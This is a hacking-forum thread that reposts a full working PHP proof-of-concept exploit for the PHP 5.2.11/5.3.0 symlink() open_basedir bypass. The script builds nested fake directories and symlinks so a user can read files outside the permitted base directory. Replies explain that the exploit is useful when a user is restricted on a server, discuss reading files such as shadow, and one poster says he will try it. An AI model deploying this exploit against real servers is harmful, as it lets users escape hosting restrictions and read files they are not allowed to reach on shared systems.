» PHP 5.2.11/5.3.0 symlink() open_basedir bypass

[dsf]

Just got a notification on my email account
about this vulnerability, where a user could
bypass open_basedir in the last stable PHP
versions.

Original advisory

PoC exploit:

PHP Code:

<?php
/*
PHP 5.2.11/5.3.0 symlink() open_basedir bypass 
by Maksymilian Arciemowicz http://securityreason.com/
cxib [ a.T] securityreason [ d0t] com

CHUJWAMWMUZG
*/

$fakedir="cx";
$fakedep=16;

$num=0; // offset of symlink.$num

if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
else $file="";

echo '<PRE><img
src="http://securityreason.com/gfx/logo.gif?cx5211.php"><P>This is exploit
from <a
href="http://securityreason.com/" title="Security Audit PHP">Security Audit
Lab - SecurityReason</a> labs.
Author : Maksymilian Arciemowicz
<p>Script for legal use only.
<p>PHP 5.2.11 5.3.0 symlink open_basedir bypass
<p>More: <a href="http://securityreason.com/">SecurityReason</a>
<p><form name="form"
 action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF
"]).'" method="post"><input type="text" name="file" size="50"
value="'.htmlspecialchars($file).'"><input type="submit" name="hym"
value="Create Symlink"></form>';

if(empty($file))
    exit;

if(!is_writable("."))
    die("not writable directory");

$level=0;

for($as=0;$as<$fakedep;$as++){
    if(!file_exists($fakedir))
        mkdir($fakedir);
    chdir($fakedir);
}

while(1<$as--) chdir("..");

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
    if(!empty($hardstyle[$a])){
        if(!file_exists($hardstyle[$a])) 
            mkdir($hardstyle[$a]);
        chdir($hardstyle[$a]);
        $as++;
    }
}
$as++;
while($as--)
    chdir("..");

@rmdir("fakesymlink");
@unlink("fakesymlink");

@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");

// this loop will skip allready created symlinks.
while(1)
    if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file,
"symlink".$num))) break;
    else $num++;

@unlink("fakesymlink");
mkdir("fakesymlink");

die('<FONT COLOR="RED">check symlink <a
href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');

?>

It's still fresh on the news

[ccoder]

tanx man , what can we do with kind of bug ?

[MaXe]

Quote:

Originally Posted by ccoder

what can we do with kind of bug ?

Bypass PHP open_basedir (a kind of safe_mode) ccoder :-P

Very useful if you have PHP access to a server and if you're blocked by open_basedir()

[ccoder]

Tanx MaXe ,

i have read about php safe mode at php.net

Code:

http://php.net/manual/en/ini.sect.safe-mode.php

i think we can load restricted file like shadow with this flaw , am i right ?

[MaXe]

Quote:

Originally Posted by ccoder

Tanx MaXe ,

i have read about php safe mode at php.net

Code:

http://php.net/manual/en/ini.sect.safe-mode.php

i think we can load restricted file like shadow with this flaw , am i right ?

It's good that you read the "manual" for safe mode in PHP.

However it is not possible to load restricted files that are owned by
root just because you can bypass a minor restriction in PHP ccoder.

You still need root privileges which is why the technique or method to
gain that is called: Privilege escalation (as in getting admin or root).

[N4ck0]

nice one brother
thx for share

[SaD HaCk3r]

ThX AloT i WilL Try :)